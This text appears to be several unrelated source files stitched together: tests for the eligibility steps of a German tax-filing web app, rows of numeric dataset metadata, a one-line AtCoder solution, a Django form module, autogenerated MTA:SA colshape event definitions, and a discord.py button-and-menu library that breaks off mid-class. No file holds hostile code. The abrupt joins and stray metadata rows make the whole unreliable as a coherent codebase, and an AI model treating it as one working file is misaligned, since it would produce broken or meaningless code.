('no', ngettext('form.eligibility.foreign_country.no', 'form.eligibility.foreign_country.no', num=expected_number_of_users))]
with app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
assert step.render_info.form.foreign_country_eligibility.choices == expected_choices
class TestEligibilitySuccessDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context, app):
self.req = test_request_context
self.app = app
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
correct_session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'no',
'employment_income_eligibility': 'no',
'other_income_eligibility': 'no',
'foreign_country_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
EligibilitySuccessDisplaySteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_user_b_has_no_elster_account_then_set_correct_info(self):
expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success')]
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_wants_no_cheaper_check_then_set_correct_info(self):
expected_information = [_('form.eligibility.result-note.capital_investment')]
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_has_no_minimal_investment_income_then_set_correct_info(self):
expected_information = [_('form.eligibility.result-note.capital_investment')]
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'yes', }
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_b_has_no_elster_account_and_user_wants_no_cheaper_check_then_set_correct_info(self):
expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success'),
_('form.eligibility.result-note.capital_investment')]
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_b_has_no_elster_account_and_user_has_minimal_investment_income_check_then_set_correct_info(self):
expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success'),
_('form.eligibility.result-note.capital_investment')]
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'yes', }
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_no_user_b_elster_account_and_no_cheaper_check_then_set_no_info(self):
expected_information = []
with patch('app.forms.steps.eligibility_steps._', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilitySuccessDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=EligibilitySuccessDisplaySteuerlotseStep.prepare_render_info(
{}))
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
class TestEligibilityMaybeDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context, app):
self.req = test_request_context
self.app = app
def test_if_user_b_has_no_elster_account_then_set_correct_info(self):
expected_information = []
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_both_have_elster_account_then_set_correct_info(self):
expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe']
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'yes',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_wants_no_cheaper_check_then_set_correct_info(self):
expected_information = ['form.eligibility.result-note.capital_investment']
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_user_has_no_minimal_investment_income_then_set_correct_info(self):
expected_information = ['form.eligibility.result-note.capital_investment']
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'yes', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_both_users_have_elster_account_and_user_wants_no_cheaper_check_then_set_correct_info(self):
expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe',
'form.eligibility.result-note.capital_investment']
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'yes',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'no',
'taxed_investment_income_eligibility': 'yes',
'cheaper_check_eligibility': 'no', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_both_users_have_elster_account_and_user_has_minimal_investment_income_check_then_set_correct_info(self):
expected_information = ['form.eligibility.result-note.both_elster_account-registration-maybe',
'form.eligibility.result-note.capital_investment']
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'yes',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'yes',
'minimal_investment_income_eligibility': 'yes',
'taxed_investment_income_eligibility': 'yes', }
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
stored_data=session_data,
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{})
)
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
def test_if_no_special_case_then_set_only_deadline_info(self):
expected_information = []
with patch('app.forms.steps.eligibility_steps._l', MagicMock(side_effect=lambda text_id: text_id)):
step = EligibilityMaybeDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=EligibilityMaybeDisplaySteuerlotseStep.prepare_render_info(
{}))
step.handle()
self.assertEqual(expected_information, step.render_info.additional_info['dependent_notes'])
| 61.232232
| 185
| 0.675524
| 19,633
| 209,353
| 6.730963
| 0.016044
| 0.053023
| 0.028877
| 0.052971
| 0.934634
| 0.931433
| 0.928051
| 0.925266
| 0.921959
| 0.917797
| 0
| 0.00029
| 0.24195
| 209,353
| 3,418
| 186
| 61.250146
| 0.832407
| 0.000072
| 0
| 0.893668
| 0
| 0
| 0.177886
| 0.13068
| 0
| 0
| 0
| 0
| 0.075705
| 1
| 0.094288
| false
| 0
| 0.005162
| 0
| 0.113902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
04af2b42ae3e6c0bf1206b99acf96634e5fd4226
| 95
|
py
|
Python
|
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | 3
|
2019-08-16T16:55:48.000Z
|
2021-04-11T10:21:40.000Z
|
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
code/abc124_c_02.py
|
KoyanagiHitoshi/AtCoder
|
731892543769b5df15254e1f32b756190378d292
|
[
"MIT"
] | null | null | null |
s=input()
print(min(s[::2].count("0")+s[1::2].count("1"),s[::2].count("1")+s[1::2].count("0")))
| 47.5
| 85
| 0.505263
| 22
| 95
| 2.181818
| 0.363636
| 0.5
| 0.291667
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0.010526
| 95
| 2
| 85
| 47.5
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
04b06f0d814185f95da52e69c66216dbdfd08eb6
| 1,097
|
py
|
Python
|
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
dzprojects/project/forms.py
|
Aniter-amine/Projects-Posting
|
f7ea6739d9cf179963123ef7a11cbf95f9886d48
|
[
"Apache-2.0"
] | null | null | null |
from django import forms
from .models import Project
# Categories settings
class ProjectForm(forms.ModelForm):
class Meta:
model = Project
fields = ('title', 'body', 'header_image',
'website_link', 'repository_link')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'website_link': forms.TextInput(attrs={'class': 'form-control'}),
'repository_link': forms.TextInput(attrs={'class': 'form-control'}),
}
class EditForm(forms.ModelForm):
class Meta:
model = Project
fields = ('title', 'body', 'header_image',
'website_link', 'repository_link')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'}),
'body': forms.Textarea(attrs={'class': 'form-control'}),
'website_link': forms.TextInput(attrs={'class': 'form-control'}),
'repository_link': forms.TextInput(attrs={'class': 'form-control'}),
}
| 33.242424
| 80
| 0.577028
| 106
| 1,097
| 5.877358
| 0.264151
| 0.128411
| 0.179775
| 0.269663
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0.853933
| 0
| 0
| 0.257065
| 1,097
| 32
| 81
| 34.28125
| 0.764417
| 0.01732
| 0
| 0.75
| 0
| 0
| 0.282528
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
04b4409aa65f1727db3ee7a14678cdccd86b60d5
| 6,952
|
py
|
Python
|
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | 1
|
2021-02-24T21:50:18.000Z
|
2021-02-24T21:50:18.000Z
|
events/colshape_events.py
|
mtasa-typescript/mtasa-wiki-dump
|
edea1746850fb6c99d6155d1d7891e2cceb33a5c
|
[
"MIT"
] | null | null | null |
# Autogenerated file. ANY CHANGES WILL BE OVERWRITTEN
from to_python.core.types import FunctionType, \
FunctionArgument, \
FunctionArgumentValues, \
FunctionReturnTypes, \
FunctionSignature, \
FunctionDoc, \
EventData, \
CompoundEventData
DUMP_PARTIAL = [
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientColShapeHit',
docs=FunctionDoc(
description='This event is triggered when a physical element hits a colshape.' ,
arguments={
"theElement": """the element that entered the colshape. """,
"matchingDimension": """a boolean referring to whether the hit collision shape was in the same dimension as the element. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='matchingDimension',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
],
client=[
EventData(
name='onClientColShapeLeave',
docs=FunctionDoc(
description='This event is triggered when a physical element leaves a colshape.' ,
arguments={
"theElement": """the element that left the colshape. """,
"matchingDimension": """a boolean referring to whether the collision shape was in the same dimension as the element. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='theElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='matchingDimension',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
),
CompoundEventData(
server=[
EventData(
name='onColShapeHit',
docs=FunctionDoc(
description='This event is triggered when a physical element hits a colshape.' ,
arguments={
"hitElement": """: the element that entered the colshape. """,
"matchingDimension": """: a boolean referring to whether the hit collision shape was in the same dimension as the element. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='hitElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='matchingDimension',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
),
CompoundEventData(
server=[
EventData(
name='onColShapeLeave',
docs=FunctionDoc(
description='This event is triggered when a player or a vehicle leaves a collision shape.' ,
arguments={
"leaveElement": """: The element that who exited the col shape. This can be a player or a vehicle. """,
"matchingDimension": """: a boolean referring to whether the collision shape was in the same dimension as the element. """
},
result='' ,
),
arguments=FunctionArgumentValues(
arguments=[
[
FunctionArgument(
name='leaveElement',
argument_type=FunctionType(
names=['element'],
is_optional=False,
),
default_value=None,
)
],
[
FunctionArgument(
name='matchingDimension',
argument_type=FunctionType(
names=['bool'],
is_optional=False,
),
default_value=None,
)
]
],
variable_length=False,
),
)
],
client=[
],
)
]
| 37.578378
| 146
| 0.353999
| 358
| 6,952
| 6.790503
| 0.22905
| 0.032908
| 0.07898
| 0.095434
| 0.815302
| 0.776635
| 0.776635
| 0.755245
| 0.755245
| 0.729741
| 0
| 0
| 0.579114
| 6,952
| 184
| 147
| 37.782609
| 0.830827
| 0.007336
| 0
| 0.691011
| 1
| 0
| 0.171329
| 0.003044
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005618
| 0
| 0.005618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d22e794a0a44e1a00c2a830d83667517260428b
| 18,857
|
py
|
Python
|
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | 8
|
2022-02-04T10:02:30.000Z
|
2022-03-23T06:09:53.000Z
|
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | null | null | null |
package/btns_menus/Combinations.py
|
Core7-Development/discord_btns_menus
|
7cc62ddaf8cfa17179bf705155c92cd4db6ea59d
|
[
"MIT"
] | 2
|
2022-02-04T17:29:20.000Z
|
2022-03-08T04:59:18.000Z
|
from btns_menus.builds.abc import *
from btns_menus.builds.button_ import SButton, Btn
from btns_menus.builds.menu_ import SDropMenu, Menu
from typing import *
import discord
from discord import ui
class BtnAndDropMenu:
def __init__(self, author: discord.Member, button1: SButton, menu1: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.menu1 = menu1
self.components = [self.btn1, self.menu1]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: BtnAndDropMenu(
self.author, self.btn1, self.menu1, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn2AndDropMenu:
def __init__(self, author: discord.Member, button1: SButton, button2: SButton, menu1: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param menu1: takes Dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.menu1 = menu1
self.components = [self.btn1, self.btn2, self.menu1]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: Btn2AndDropMenu(
self.author, self.btn1, self.btn2, self.menu1, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn3AndDropMenu:
def __init__(self, author: discord.Member, button1: SButton,
button2: SButton, button3: SButton, menu1: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param button3: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.btn3 = button3
self.menu1 = menu1
self.components = [self.btn1, self.btn2, self.btn3, self.menu1]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: Btn3AndDropMenu(self.author, self.btn1, self.btn2,
self.btn3, self.menu1, timeout=self.timeout)
def view(self) -> ui.View:
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn4AndDropMenu:
def __init__(self, author: discord.Member, button1: SButton,
button2: SButton, button3: SButton, button4: SButton, menu1: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param button3: takes button type SButton
:param button4: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.btn3 = button3
self.btn4 = button4
self.menu1 = menu1
self.components = [self.btn1, self.btn2,
self.btn3, self.btn4, self.menu1]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: Btn4AndDropMenu(self.author, self.btn1, self.btn2,
self.btn3, self.btn4, self.menu1, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class BtnAnd2DropMenu:
def __init__(self, author: discord.Member, button1: SButton, menu1: SDropMenu, menu2: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.menu1 = menu1
self.menu2 = menu2
self.components = [self.btn1, self.menu1, menu2]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: BtnAnd2DropMenu(
self.author, self.btn1, self.menu1, self.menu2, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn2And2DropMenu:
def __init__(self, author: discord.Member, button1: SButton, button2: SButton, menu1: SDropMenu, menu2: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.menu1 = menu1
self.menu2 = menu2
self.components = [self.btn1, self.btn2, self.menu1, self.menu2]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: Btn2And2DropMenu(self.author, self.btn1, self.btn2, self.menu1,
self.menu2, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn3And2DropMenu:
def __init__(self, author: discord.Member, button1: SButton, button2: SButton, button3: SButton,
menu1: SDropMenu, menu2: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param button3: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.btn3 = button3
self.menu1 = menu1
self.menu2 = menu2
self.components = [self.btn1, self.btn2,
self.btn3, self.menu1, self.menu2]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: Btn3And2DropMenu(self.author, self.btn1, self.btn2, self.btn3, self.menu1,
self.menu2, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class BtnAnd3DropMenu:
def __init__(self, author: discord.Member, button1: SButton,
menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param menu3: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.menu1 = menu1
self.menu2 = menu2
self.menu3 = menu3
self.components = [self.btn1, self.menu1, self.menu2, self.menu3]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
self.root_ = lambda: BtnAnd3DropMenu(self.author, self.btn1, self.menu1, self.menu2,
self.menu3, timeout=self.timeout)
def view(self) -> ui.View:
""":returns: discord.ui.View"""
view_ = ui.View(timeout=self.timeout)
for component_ in self.components:
if not component_.hidden:
if isinstance(component_, SButton):
view_.add_item(Btn(self.root_, component_))
else:
view_.add_item(Menu(self.root_, component_))
return view_
class Btn2And3DropMenu:
def __init__(self, author: discord.Member, button1: SButton, button2: SButton,
menu1: SDropMenu, menu2: SDropMenu, menu3: SDropMenu,
*, timeout: Optional[float] = DEFAULT_TIMEOUT):
"""
Responsive Buttons and DropMenus
:param author: Interaction User
:param button1: takes button type SButton
:param button2: takes button type SButton
:param menu1: takes dropmenu type SDropMenu
:param menu2: takes dropmenu type SDropMenu
:param menu3: takes dropmenu type SDropMenu
:param timeout: Interaction Timeout
:returns: view: discord.ui.View
"""
self.author = author
self.timeout = timeout
self.btn1 = button1
self.btn2 = button2
self.menu1 = menu1
self.menu2 = menu2
self.menu3 = menu3
self.components = [self.btn1, self.btn2,
self.menu1, self.menu2, self.menu3]
for component_ in self.components:
if component_.author is None:
component_.update(author=self.author)
